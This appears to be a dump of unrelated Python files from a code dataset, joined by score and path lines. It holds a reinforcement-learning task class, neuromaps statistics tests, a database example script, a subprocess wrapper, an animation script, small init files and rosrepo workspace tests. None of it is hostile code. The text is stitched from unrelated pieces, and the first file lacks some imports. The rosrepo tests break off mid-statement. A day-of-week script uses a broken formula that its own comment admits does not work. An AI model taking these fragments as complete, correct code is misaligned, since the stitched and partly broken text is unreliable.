from pyrado.tasks.base import Task
from pyrado.tasks.reward_functions import RewFcn
from pyrado.utils.input_output import print_cbt
class SequentialTasks(Task):
""" Task class for a sequence of tasks a.k.a. goals """
def __init__(self,
tasks: Sequence[Task],
start_idx: int = 0,
hold_rew_when_done: bool = False,
verbose: bool = False):
"""
Constructor
:param tasks: sequence of tasks a.k.a. goals, the order matters
:param start_idx: index of the task to start with, by default with the first one in the list
:param hold_rew_when_done: if `True` reward values for done tasks will be stored and added every step
:param verbose: print messages on task completion
.. note::
`hold_rew_when_done=True` only makes sense for positive rewards.
"""
self._tasks = deepcopy(tasks)
self._idx_curr = start_idx
self.succeeded_tasks = np.full(len(self), False, dtype=bool)
self.failed_tasks = np.full(len(self), False, dtype=bool)
self.succeeded_tasks[:start_idx] = True # check off tasks which are before the start task
self.hold_rew_when_done = hold_rew_when_done
if self.hold_rew_when_done:
self.held_rews = np.zeros(len(self))
self.verbose = verbose
def __len__(self) -> int:
return len(self._tasks)
@property
def env_spec(self) -> EnvSpec:
return self._tasks[0].env_spec # safe to assume that all tasks have the same env_spec
@property
def tasks(self) -> Sequence[Task]:
""" Get the list of tasks. """
return deepcopy(self._tasks)
@property
def idx_curr(self) -> int:
""" Get the index of the currently active task. """
return self._idx_curr
@idx_curr.setter
def idx_curr(self, idx: int):
""" Set the index of the currently active task. """
if not (0 <= idx < len(self)):
raise pyrado.ValueErr(given=idx, ge_constraint='0', le_constraint=f'{len(self) - 1}')
self._idx_curr = idx
@property
def state_des(self) -> np.ndarray:
""" Get the desired state the current task. """
return self._tasks[self._idx_curr].state_des
@state_des.setter
def state_des(self, state_des: np.ndarray):
""" Set the desired state the current task. """
if not isinstance(state_des, np.ndarray):
raise pyrado.TypeErr(given=state_des, expected_type=np.ndarray)
self._tasks[self._idx_curr].state_des = state_des
@property
def space_des(self) -> Space:
""" Get the desired space the current task. """
return self._tasks[self._idx_curr].space_des
@space_des.setter
def space_des(self, space_des: Space):
""" Set the desired space the current task. """
if not isinstance(space_des, Space):
raise pyrado.TypeErr(given=space_des, expected_type=Space)
self._tasks[self._idx_curr].space_des = space_des
@property
def rew_fcn(self) -> RewFcn:
""" Get the reward function of the current task. """
return self._tasks[self._idx_curr].rew_fcn
def step_rew(self, state: np.ndarray, act: np.ndarray, remaining_steps: int) -> float:
""" Get the step reward from the current task. """
step_rew = 0.
if self.hold_rew_when_done:
for i in range(len(self)):
# Iterate over previous tasks
if self.succeeded_tasks[i] or self.failed_tasks[i]:
# Add the last reward from every done task (also true for failed tasks)
step_rew += self.held_rews[i]
if not (self.succeeded_tasks[self._idx_curr] or self.failed_tasks[self._idx_curr]):
# Only give step reward if current sub-task is active
step_rew += self._tasks[self._idx_curr].step_rew(state, act, remaining_steps)
final_rew = self._is_curr_task_done(state, act, remaining_steps) # zero if the task is not done
# self.logger.add_value('successful tasks', self.successful_tasks)
return step_rew + final_rew
def compute_final_rew(self, state: np.ndarray, remaining_steps: int) -> float:
"""
Compute the reward / cost on task completion / fail of this task.
Since this task holds multiple sub-tasks, the final reward / cost is computed for them, too.
.. note::
The `ParallelTasks` class is not a subclass of `TaskWrapper`, i.e. this function only looks at the
immediate sub-tasks.
:param state: current state of the environment
:param remaining_steps: number of time steps left in the episode
:return: final reward of all sub-tasks
"""
sum_final_rew = 0.
for t in self._tasks:
sum_final_rew += t.compute_final_rew(state, remaining_steps)
return sum_final_rew
def reset(self, **kwargs):
""" Reset all tasks. """
self.idx_curr = 0
for s in self._tasks:
s.reset(**kwargs)
# Reset internal check list for done tasks
self.succeeded_tasks = np.full(len(self), False, dtype=bool)
self.failed_tasks = np.full(len(self), False, dtype=bool)
if 'start_idx' in kwargs:
self.succeeded_tasks[:kwargs['start_idx']] = True
# Reset the stored reward values for done tasks
if self.hold_rew_when_done:
self.held_rews = np.zeros(len(self)) # doesn't work with start_idx
def _is_curr_task_done(self,
state: np.ndarray,
act: np.ndarray,
remaining_steps: int,
verbose: bool = False) -> float:
"""
Check if the current task is done. If so, move to the next one and return the final reward of this task.
:param state: current state
:param act: current action
:param remaining_steps: number of time steps left in the episode
:param verbose: print messages on success or failure
:return: final return of the current subtask
"""
if not self.succeeded_tasks[self._idx_curr] and not self.failed_tasks[self._idx_curr] and self._tasks[self._idx_curr].is_done(state):
# Task has not been marked done yet, but is now done
if self._tasks[self._idx_curr].has_succeeded(state):
# Check off successfully completed task
self.succeeded_tasks[self._idx_curr] = True
if verbose:
print_cbt(f'task {self._idx_curr} has succeeded (is done) at state {state}', 'g')
elif self._tasks[self._idx_curr].has_failed(state):
# Check off unsuccessfully completed task
self.failed_tasks[self._idx_curr] = True
if verbose:
print_cbt(f'Task {self._idx_curr} has failed (is done) at state {state}', 'r')
else:
raise pyrado.ValueErr(msg=f'Task {self._idx_curr} neither succeeded or failed but is done!')
# Memorize current reward
if self.hold_rew_when_done:
self.held_rews[self._idx_curr] = self._tasks[self._idx_curr].step_rew(state, act, remaining_steps=0)
# Give a reward for completing the task defined by the task
task_final_rew = self._tasks[self._idx_curr].final_rew(state, remaining_steps)
# Advance to the next task
self.idx_curr = (self._idx_curr + 1) % len(self)
else:
task_final_rew = 0.
return task_final_rew
def has_succeeded(self, state: np.ndarray) -> bool:
"""
Check if this tasks is done. The SequentialTasks is successful if all sub-tasks are successful.
:param state: environments current state
:return: `True` if succeeded
"""
successful = np.all(self.succeeded_tasks)
if successful and self.verbose:
print_cbt(f'All {len(self)} sequential sub-tasks are done successfully', 'g')
return successful
| 2.609375 | 3 |
neuromaps/tests/test_stats.py | VinceBaz/neuromaps | 0 | 12797784 | # -*- coding: utf-8 -*-
"""
For testing neuromaps.stats functionality
"""
import numpy as np
import pytest
from neuromaps import stats
@pytest.mark.xfail
def test_compare_images():
assert False
def test_permtest_metric():
rs = np.random.default_rng(12345678)
x, y = rs.random(size=(2, 100))
r, p = stats.permtest_metric(x, y)
assert np.allclose([r, p], [0.0345815411043023, 0.7192807192807192])
r, p = stats.permtest_metric(np.c_[x, x[::-1]], np.c_[y, y])
assert np.allclose(r, [0.0345815411043023, 0.03338608427980476])
assert np.allclose(p, [0.7192807192807192, 0.7472527472527473])
@pytest.mark.parametrize('x, y, expected', [
# basic one-dimensional input
(range(5), range(5), (1.0, 0.0)),
# broadcasting occurs regardless of input order
(np.stack([range(5), range(5, 0, -1)], 1), range(5),
([1.0, -1.0], [0.0, 0.0])),
(range(5), np.stack([range(5), range(5, 0, -1)], 1),
([1.0, -1.0], [0.0, 0.0])),
# correlation between matching columns
(np.stack([range(5), range(5, 0, -1)], 1),
np.stack([range(5), range(5, 0, -1)], 1),
([1.0, 1.0], [0.0, 0.0]))
])
def test_efficient_pearsonr(x, y, expected):
assert np.allclose(stats.efficient_pearsonr(x, y), expected)
def test_efficient_pearsonr_errors():
with pytest.raises(ValueError):
stats.efficient_pearsonr(range(4), range(5))
assert all(np.isnan(a) for a in stats.efficient_pearsonr([], []))
| 1.625 | 2 |
api/get_numpy_array_from_dbase.py | fmidev/ml-feature-db | 0 | 12797792 | <gh_stars>0
#!/usr/bin/python
# -*- coding: utf-8 -*-
from configparser import ConfigParser
#from lib import mlfb
#from lib import mlfb_test4
from lib import mlfb
def main():
# Example script to use mlfb class
#a = mlfb_test4.mlfb_test4(1)
#a = mlfb.mlfb_test4(1)
a = mlfb.mlfb(1)
#input1=999
#input1=99.88
#input1=99,66
#input1=99.55
#input1='atest9988'
#input1=97
#input1='atest1188'
# (type_in, 'null', '20180226T165000',666,'testpara1',665))
#type_in,time_in,location_id_in,parameter_in,value_in
input_type='4test2288'
input_source='null'
input_time='20180226T165000'
input_location_id=455
input_parameter='test2para'
input_value=441
#a.insert_row_trains_1('test99')
#a.insert_row_trains_1(input_type,input_source,input_time,input_location_id,input_parameter,input_value)
#input_location_id=5
input_location_id=1
#input_parameter='temperature'
input_parameter='temperature'
input_value=-9
# get rows
a.get_rows_from_postgre_to_numpy(input_parameter,input_value)
if __name__=='__main__':
main() | 1.484375 | 1 |
deepnlpf/core/execute.py | deepnlpf/deepnlpf | 3 | 12797800 | <filename>deepnlpf/core/execute.py<gh_stars>1-10
# -*- coding: utf-8 -*-
import deepnlpf.log as log
class Execute (object):
""" Execute Scripts External in Outher Language Programation. """
def __init__(self):
pass
def run_r(self, script, *args):
import rpy2.robjects as ro
r = ro.r
r.source(script)
return r.main(*args)
def run_java(self, jar_file, *args):
try:
import subprocess
return subprocess.check_output(['java', '-jar', jar_file, *args], shell=False)
except Exception as err:
log.logger.error(err) | 1.28125 | 1 |
random surface growth/generate_anim_with_one_amoeba.py | ricsirke/simulations | 0 | 12797808 | <gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
N = 100
world = np.zeros((N, N))
def get_neighs(i,j):
neighs = []
if i+1 < N:
neighs.append([i+1,j])
if j+1 < N:
neighs.append([i,j+1])
if 0 <= i-1:
neighs.append([i-1,j])
if 0 <= j-1:
neighs.append([i,j-1])
return neighs
starting_point_coord = int(np.floor(N/2))
starting_point = [starting_point_coord, starting_point_coord]
amoebe = [starting_point]
amoebe_mark = 1
world[0,0] = amoebe_mark
perimeters = get_neighs(*starting_point)
####################################################################
fig = plt.figure()
im = plt.imshow(world)
pos_x = 0
pos_y = -8
player_score_text_handle = plt.text(pos_x, pos_y, "blocks: 0")
perimeter_score_text_handle = plt.text(0, -3, "perimeter blocks: 0")
def animate(i):
global perimeters, world, im
random_index = np.random.randint(0, len(perimeters))
random_perimeter = perimeters.pop(random_index)
print(random_perimeter)
neighs = get_neighs(*random_perimeter)
# filter inner points
new_perimeters = []
for neigh in neighs:
if world[neigh[0], neigh[1]] != amoebe_mark and neigh not in perimeters:
new_perimeters.append(neigh)
#######
perimeters = perimeters + new_perimeters
world[random_perimeter[0], random_perimeter[1]] = amoebe_mark
im.set_array(world)
player_score_text_handle.set_text("player: " + str(i))
perimeter_score_text_handle.set_text("perimeter:" + str(len(perimeters)))
interval_ms = 50
anim = FuncAnimation(fig, animate, frames=2000, interval = interval_ms, repeat = False)
plt.axis('off')
anim.save("anim.mp4")
####################################################################
#plt.show()
| 2.453125 | 2 |
practice1/5.1.py | StanislavDanilov/python3_course | 0 | 12797816 | <gh_stars>0
day = int(input(": "))
m = int(input(": "))
year = int(input(": "))
if m == 2:
m = 12
elif m == 1:
m = 11
else:
m -= 2
c = year%100
print((day + ((13*m -1) //5) + year + year + (year //4 + c//4 - 2*c + 777)) % 7 )
#not job !!!!
| 2.15625 | 2 |
pyspark_db_utils/ch/__init__.py | osahp/pyspark_db_utils | 7 | 12797824 | <gh_stars>1-10
from .write_to_ch import write_to_ch
from .read_from_ch import read_from_ch
| 0.472656 | 0 |
swiftst/node/__init__.py | btorch/swift-setuptools | 0 | 12797832 | <reponame>btorch/swift-setuptools
""" Location for deploying swift nodes """
| -0.092773 | 0 |
test/test_workspace.py | fkie/rosrepo | 5 | 12797840 | <reponame>fkie/rosrepo
# coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: <NAME>
#
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import unittest
import os
import shutil
import yaml
import pickle
from tempfile import mkdtemp
try:
from mock import patch
except ImportError:
from unittest.mock import patch
import sys
sys.stderr = sys.stdout
from rosrepo.config import Config
import test.helper as helper
class WorkspaceTest(unittest.TestCase):
def setUp(self):
self.ros_root_dir = mkdtemp()
self.wsdir = mkdtemp()
self.homedir = mkdtemp()
helper.create_fake_ros_root(self.ros_root_dir)
helper.create_package(self.wsdir, "alpha", ["beta", "gamma", "installed-system"])
helper.create_package(self.wsdir, "beta", ["delta"])
helper.create_package(self.wsdir, "gamma", [])
helper.create_package(self.wsdir, "delta", [])
helper.create_package(self.wsdir, "epsilon", ["broken"])
helper.create_package(self.wsdir, "broken", ["missing"])
helper.create_package(self.wsdir, "incomplete", ["missing-system"])
helper.create_package(self.wsdir, "ancient", [], deprecated=True)
helper.create_package(self.wsdir, "ancient2", [], deprecated="Walking Dead")
for blacklisted_key in ["ROS_WORKSPACE", "ROS_PACKAGE_PATH"]:
if blacklisted_key in os.environ:
del os.environ[blacklisted_key]
os.environ["HOME"] = self.homedir
os.environ["XDG_CONFIG_HOME"] = os.path.join(self.homedir, ".config")
def tearDown(self):
shutil.rmtree(self.wsdir, ignore_errors=True)
shutil.rmtree(self.homedir, ignore_errors=True)
shutil.rmtree(self.ros_root_dir, ignore_errors=True)
self.ros_root_dir = None
self.wsdir = None
def get_config_value(self, key, default=None):
cfg = Config(self.wsdir, read_only=True)
return cfg.get(key, default)
def test_bash(self):
"""Test proper behavior of 'rosrepo bash'"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
self.assertEqual(
helper.run_rosrepo("bash", "-w", self.wsdir, "ROS_WORKSPACE", "ROS_PACKAGE_PATH", "PATH", "UNKNOWN"),
(0, "ROS_WORKSPACE=%(wsdir)s\nROS_PACKAGE_PATH=%(wsdir)s/src\nPATH=%(env_path)s\n# variable UNKNOWN is not set\n" % {"wsdir": self.wsdir, "env_path": os.environ["PATH"]})
)
os.environ["ROS_PACKAGE_PATH"] = os.pathsep.join(["/before"] + ["%s/src/%s" % (self.wsdir, d) for d in ["alpha", "beta", "gamma"]] + ["/after"])
self.assertEqual(
helper.run_rosrepo("bash", "-w", self.wsdir),
(0, "ROS_WORKSPACE=%(wsdir)s\nROS_PACKAGE_PATH=/before%(sep)s%(wsdir)s/src%(sep)s/after\n" % {"wsdir": self.wsdir, "sep": os.pathsep})
)
def test_clean(self):
"""Test proper behavior of 'rosrepo clean'"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
os.makedirs(os.path.join(self.wsdir, "build"))
exitcode, stdout = helper.run_rosrepo("clean", "-w", self.wsdir, "--dry-run")
self.assertEqual(exitcode, 0)
self.assertTrue(os.path.isdir(os.path.join(self.wsdir, "build")))
exitcode, stdout = helper.run_rosrepo("clean", "-w", self.wsdir)
self.assertEqual(exitcode, 0)
self.assertFalse(os.path.isdir(os.path.join(self.wsdir, "build")))
def test_upgrade_from_version_1(self):
"""Test if workspaces from rosrepo 1.x are migrated properly"""
os.rename(os.path.join(self.wsdir, "src"), os.path.join(self.wsdir, "repos"))
os.makedirs(os.path.join(self.wsdir, "src"))
with open(os.path.join(self.wsdir, "src", "CMakeLists.txt"), "w"):
pass
with open(os.path.join(self.wsdir, "src", "toplevel.cmake"), "w"):
pass
with open(os.path.join(self.wsdir, ".catkin_workspace"), "w"):
pass
os.symlink(os.path.join("..", "repos", "alpha"), os.path.join(self.wsdir, "src", "alpha"))
os.symlink(os.path.join("..", "repos", "beta"), os.path.join(self.wsdir, "src", "beta"))
os.symlink(os.path.join("..", "repos", "gamma"), os.path.join(self.wsdir, "src", "gamma"))
os.symlink(os.path.join("..", "repos", "delta"), os.path.join(self.wsdir, "src", "delta"))
with open(os.path.join(self.wsdir, "repos", ".metainfo"), "w") as f:
f.write(yaml.safe_dump(
{
"alpha": {"auto": False, "pin": False},
"beta": {"auto": False, "pin": True},
"gamma": {"auto": True, "pin": False},
"delta": {"auto": True, "pin": False},
},
default_flow_style=False
))
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
self.assertEqual(
helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
(0, "alpha\nbeta\ndelta\ngamma\n")
)
self.assertEqual(self.get_config_value("default_build"), ["alpha"])
self.assertEqual(self.get_config_value("pinned_build"), ["beta"])
def test_upgrade_from_version_2(self):
"""Test if workspaces from rosrepo 2.x are migrated properly"""
with open(os.path.join(self.wsdir, ".catkin_workspace"), "w"):
pass
os.makedirs(os.path.join(self.wsdir, ".catkin_tools", "profiles", "rosrepo"))
os.makedirs(os.path.join(self.wsdir, ".rosrepo"))
from rosrepo.common import PkgInfo
with open(os.path.join(self.wsdir, ".rosrepo", "info"), "wb") as f:
metadata = {}
metadata["alpha"] = PkgInfo()
metadata["beta"] = PkgInfo()
metadata["alpha"].selected = True
metadata["beta"].selected = True
metadata["beta"].pinned = True
f.write(pickle.dumps(metadata))
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
self.assertEqual(
helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
(0, "alpha\nbeta\ndelta\ngamma\n")
)
self.assertEqual(self.get_config_value("default_build"), ["alpha"])
self.assertEqual(self.get_config_value("pinned_build"), ["beta"])
def test_upgrade_from_older_version_3(self):
"""Test if workspaces from rosrepo 3.x are upgraded to latest version"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "alpha")
self.assertEqual(exitcode, 0)
cfg = Config(self.wsdir)
cfg["version"] = "3.0.0a0"
cfg.write()
self.assertEqual(
helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
(0, "alpha\nbeta\ndelta\ngamma\n")
)
from rosrepo import __version__ as rosrepo_version
self.assertEqual(self.get_config_value("version"), rosrepo_version)
def test_incompatible_new_version(self):
"""Test if workspaces from future rosrepo versions are detected"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
cfg = Config(self.wsdir)
cfg["version"] = "999.0"
cfg.write()
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-n")
self.assertEqual(exitcode, 1)
self.assertIn("newer version", stdout)
def test_buildset(self):
"""Test proper behavior of 'rosrepo include' and 'rosrepo exclude'"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--dry-run", "alpha")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("default_build", []), [])
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "alpha")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("default_build"), ["alpha"])
self.assertEqual(self.get_config_value("pinned_build"), [])
self.assertEqual(
helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
(0, "alpha\nbeta\ndelta\ngamma\n")
)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--pinned", "beta")
self.assertEqual(exitcode, 0)
self.assertEqual(
helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
(0, "alpha\nbeta\ndelta\ngamma\n")
)
self.assertEqual(self.get_config_value("pinned_build"), ["beta"])
exitcode, stdout = helper.run_rosrepo("exclude", "-w", self.wsdir, "-a")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("default_build"), [])
self.assertEqual(
helper.run_rosrepo("list", "-w", self.wsdir, "-n"),
(0, "beta\ndelta\n")
)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "beta")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("exclude", "-w", self.wsdir, "--pinned", "beta")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("default_build"), ["beta"])
self.assertEqual(self.get_config_value("pinned_build"), [])
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--pinned", "epsilon")
self.assertEqual(exitcode, 1)
self.assertIn("cannot resolve dependencies", stdout)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "epsilon")
self.assertEqual(exitcode, 1)
self.assertIn("cannot resolve dependencies", stdout)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "--all")
self.assertEqual(exitcode, 1)
self.assertIn("cannot resolve dependencies", stdout)
self.assertEqual(self.get_config_value("default_build"), ["beta"])
self.assertEqual(self.get_config_value("pinned_build"), [])
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "incomplete")
self.assertEqual(exitcode, 0)
self.assertIn("apt-get install", stdout)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--default", "ancient", "ancient2")
self.assertEqual(exitcode, 0)
self.assertIn("is deprecated", stdout)
self.assertIn("Walking Dead", stdout)
os.makedirs(os.path.join(self.wsdir, "build"))
exitcode, stdout = helper.run_rosrepo("init", "--reset", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
self.assertFalse(os.path.isdir(os.path.join(self.wsdir, "build")))
self.assertEqual(self.get_config_value("default_build", []), [])
self.assertEqual(self.get_config_value("pinned_build", []), [])
def test_build(self):
"""Test proper behavior of 'rosrepo build'"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "1")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--dry-run")
self.assertEqual(exitcode, 1)
self.assertIn("no packages to build", stdout)
helper.failing_programs = ["catkin_lint"]
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--dry-run", "alpha")
self.assertEqual(exitcode, 0)
self.assertIn("alpha", stdout)
self.assertIn("beta", stdout)
self.assertIn("gamma", stdout)
self.assertIn("delta", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "alpha")
self.assertEqual(exitcode, 1)
self.assertIn("catkin_lint reported errors", stdout)
helper.failing_programs = []
with patch("rosrepo.cmd_build.find_ros_root", lambda x: None):
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "alpha")
self.assertEqual(exitcode, 1)
self.assertIn("cannot detect ROS distribution", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--all")
self.assertEqual(exitcode, 1)
self.assertIn("cannot resolve dependencies", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-default")
self.assertEqual(exitcode, 1)
self.assertIn("no packages given", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-default", "alpha")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("default_build", []), ["alpha"])
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-pinned")
self.assertEqual(exitcode, 1)
self.assertIn("no packages given", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--set-pinned", "beta")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("pinned_build", []), ["beta"])
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir)
self.assertEqual(exitcode, 0)
self.assertIn("alpha", stdout)
self.assertIn("beta", stdout)
self.assertIn("gamma", stdout)
self.assertIn("delta", stdout)
exitcode, stdout = helper.run_rosrepo("exclude", "-w", self.wsdir, "--all")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir)
self.assertEqual(exitcode, 0)
self.assertNotIn("alpha", stdout)
self.assertNotIn("gamma", stdout)
self.assertIn("beta", stdout)
self.assertIn("delta", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "incomplete")
self.assertEqual(exitcode, 1)
self.assertIn("missing system package", stdout)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--clean")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("build", "-w", self.wsdir, "--clean", "--dry-run", "--offline", "--verbose", "--no-status", "--keep-going", "-j2")
self.assertEqual(exitcode, 0)
def test_list(self):
"""Test proper behavior of 'rosrepo list'"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "alpha")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("include", "-w", self.wsdir, "--pinned", "beta")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir)
self.assertEqual(exitcode, 0)
self.assertIn("alpha", stdout)
self.assertIn("beta", stdout)
self.assertIn("gamma", stdout)
self.assertIn("delta", stdout)
self.assertNotIn("epsilon", stdout)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-BC")
self.assertEqual(exitcode, 0)
self.assertIn("search filter", stdout)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-S")
self.assertEqual(exitcode, 0)
self.assertIn("alpha", stdout)
self.assertNotIn("beta", stdout)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-P")
self.assertEqual(exitcode, 0)
self.assertNotIn("alpha", stdout)
self.assertIn("beta", stdout)
self.assertNotIn("delta", stdout)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-Pv")
self.assertEqual(exitcode, 0)
self.assertIn("alpha", stdout)
self.assertNotIn("beta", stdout)
self.assertIn("delta", stdout)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-PD")
self.assertEqual(exitcode, 0)
self.assertNotIn("alpha", stdout)
self.assertIn("beta", stdout)
self.assertIn("delta", stdout)
exitcode, stdout = helper.run_rosrepo("list", "-w", self.wsdir, "-W")
self.assertIn("alpha", stdout)
self.assertIn("beta", stdout)
self.assertIn("epsilon", stdout)
def test_config(self):
"""Test proper behavior of 'rosrepo config'"""
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 0)
with patch("rosrepo.cmd_config.find_ros_root", lambda x: None):
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir)
self.assertEqual(exitcode, 1)
self.assertIn("cannot detect ROS distribution", stdout)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "16")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("job_limit"), 16)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "0")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("job_limit"), None)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--job-limit", "8")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("job_limit"), 8)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-job-limit")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("job_limit"), None)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--install")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("install"), True)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-install")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("install"), False)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-compiler", "clang")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("compiler"), "clang")
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-compiler", "does_not_exist")
self.assertEqual(exitcode, 1)
self.assertIn("unknown compiler", stdout)
self.assertEqual(self.get_config_value("compiler"), "clang")
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--unset-compiler")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("compiler"), None)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-crawl-depth", "2")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_crawl_depth"), 2)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-crawl-depth", "1")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_crawl_depth"), 1)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--store-credentials")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>token"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>", "--store-credentials")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("store_credentials"), True)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-store-credentials")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("store_credentials"), False)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
self.assertEqual(
helper.run_rosrepo("config", "-w", self.wsdir, "--get-gitlab-url", "does_not_exist"),
(0, "\n")
)
self.assertEqual(
helper.run_rosrepo("config", "-w", self.wsdir, "--get-gitlab-url", "Test"),
(0, "http://localhost\n")
)
self.assertEqual(
